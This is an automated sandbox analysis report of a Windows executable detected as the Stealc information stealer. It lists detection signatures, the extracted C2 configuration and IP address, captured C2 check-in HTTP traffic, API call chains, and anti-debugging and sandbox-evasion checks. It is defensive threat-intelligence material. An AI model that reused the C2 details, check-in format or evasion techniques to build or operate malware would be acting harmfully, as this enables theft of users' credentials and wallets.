
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532905
MD5: 0346a5b7e84da53552826eb2061eb3de
SHA1: 5a69a7e1fa61bb7f83f46e00616b2f2465891550
SHA256: 077cfebf17a05de67e6bd32828a6710312b4ac28c1475ae4cc3346b8607d254a
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5004 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0346A5B7E84DA53552826EB2061EB3DE)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.2105418364.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 5004 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 5004 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.620000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-14T06:53:06.649678+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.620000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.phpL | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php7 | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phps | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpE | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpC | Virustotal: Detection: 16%
Source: file.exe | Virustotal: Detection: 54%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0062C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00627240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00627240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00629AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00629AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00629B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00629B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00638EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00638EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006338B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00634910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00634910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0062DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0062E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00634570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00634570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0062ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0062BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0062DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006216D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00633EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00633EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0062F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0062F68A FindFirstFileA,0_2_0062F68A

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 43 32 44 30 46 34 45 31 32 42 32 32 32 35 30 36 35 39 38 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a
    Data Ascii:
    ------DGDBKFBAKFBFHIECFBFI
    Content-Disposition: form-data; name="hwid"

    82C2D0F4E12B2225065987
    ------DGDBKFBAKFBFHIECFBFI
    Content-Disposition: form-data; name="build"

    doma
    ------DGDBKFBAKFBFHIECFBFI--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00626280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00626280
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 43 32 44 30 46 34 45 31 32 42 32 32 32 35 30 36 35 39 38 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a
    Data Ascii:
    ------DGDBKFBAKFBFHIECFBFI
    Content-Disposition: form-data; name="hwid"

    82C2D0F4E12B2225065987
    ------DGDBKFBAKFBFHIECFBFI
    Content-Disposition: form-data; name="build"

    doma
    ------DGDBKFBAKFBFHIECFBFI--
Source: file.exe, 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2147145348.0000000001358000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2147145348.0000000001376000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
Source: file.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpC
Source: file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpE
Source: file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpL
Source: file.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
Source: file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E48AC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A6C8D5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A01D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A2903
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DF92F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E9963
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EEABA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AAD3CF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E73F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F3B0D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00979337
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093E406
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E2D9B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A6B582
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EB51F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090FED0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F564E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009DDE4B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E7E6D
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 006245C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: xxaxmlaz ZLIB complexity 0.9948426506576935
Source: file.exe, 00000000.00000003.2105418364.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00639600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00639600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00633720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00633720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Q6LV1JS6.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 54%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1829888 > 1048576
Source: file.exe | Static PE information: Raw size of xxaxmlaz is bigger than: 0x100000 < 0x198a00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.620000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxaxmlaz:EW;mnkxawcp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxaxmlaz:EW;mnkxawcp:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00639860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00639860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c291c should be: 0x1cbf24
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: xxaxmlaz
Source: file.exe | Static PE information: section name: mnkxawcp
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A8F0A8 push ecx; mov dword ptr [esp], eax | 0_2_00A8F0F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009FB090 push ebp; mov dword ptr [esp], edx | 0_2_009FB0F7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push ecx; mov dword ptr [esp], 46104685h | 0_2_009F2093
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 6BAB6E0Ch; mov dword ptr [esp], ebp | 0_2_009F20C6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push edx; mov dword ptr [esp], eax | 0_2_009F2112
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push edx; mov dword ptr [esp], edi | 0_2_009F2202
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push ebp; mov dword ptr [esp], ecx | 0_2_009F2243
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push ecx; mov dword ptr [esp], esi | 0_2_009F225D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 248EE22Ch; mov dword ptr [esp], ecx | 0_2_009F227B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push esi; mov dword ptr [esp], edi | 0_2_009F22C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push ebx; mov dword ptr [esp], eax | 0_2_009F2312
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push ecx; mov dword ptr [esp], esi | 0_2_009F2342
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 35C167C7h; mov dword ptr [esp], eax | 0_2_009F2355
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push edx; mov dword ptr [esp], esi | 0_2_009F2369
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 4A7546B0h; mov dword ptr [esp], eax | 0_2_009F2379
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 443A2291h; mov dword ptr [esp], ecx | 0_2_009F23A3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push ebp; mov dword ptr [esp], 00000000h | 0_2_009F23E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push ecx; mov dword ptr [esp], ebp | 0_2_009F2411
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 149194B5h; mov dword ptr [esp], ecx | 0_2_009F2544
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 4B656DD1h; mov dword ptr [esp], esp | 0_2_009F254C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push ecx; mov dword ptr [esp], ebp | 0_2_009F25CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push edi; mov dword ptr [esp], esi | 0_2_009F25ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push edx; mov dword ptr [esp], ebp | 0_2_009F264C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push eax; mov dword ptr [esp], ecx | 0_2_009F265D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 2F5CEF65h; mov dword ptr [esp], edi | 0_2_009F267A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 02730901h; mov dword ptr [esp], edx | 0_2_009F2752
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 49A27EAEh; mov dword ptr [esp], eax | 0_2_009F275F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 1E7FFD71h; mov dword ptr [esp], ecx | 0_2_009F27E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 3332EB4Ch; mov dword ptr [esp], ebp | 0_2_009F283E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push 23FB7B74h; mov dword ptr [esp], edx | 0_2_009F2962
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F208E push eax; mov dword ptr [esp], 77AA37ADh | 0_2_009F2A65
Source: file.exe | Static PE information: section name: xxaxmlaz entropy: 7.954308030352957

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00639860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00639860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13699)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8821EA second address: 8821F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F9FAC second address: 9F9FB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F9FB0 second address: 9F9FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FA14B second address: 9FA156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0B09070BC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FA156 second address: 9FA164 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F0B08CB6D16h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FA448 second address: 9FA44E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FA726 second address: 9FA750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B08CB6D1Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0B08CB6D25h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FC179 second address: 9FC183 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0B09070BCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9FC183 second address: 9FC1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F0B08CB6D27h 0x0000000e push 00000000h 0x00000010 jmp 00007F0B08CB6D1Bh 0x00000015 push ADCCDBEDh 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0B08CB6D23h 0x00000021 rdtsc
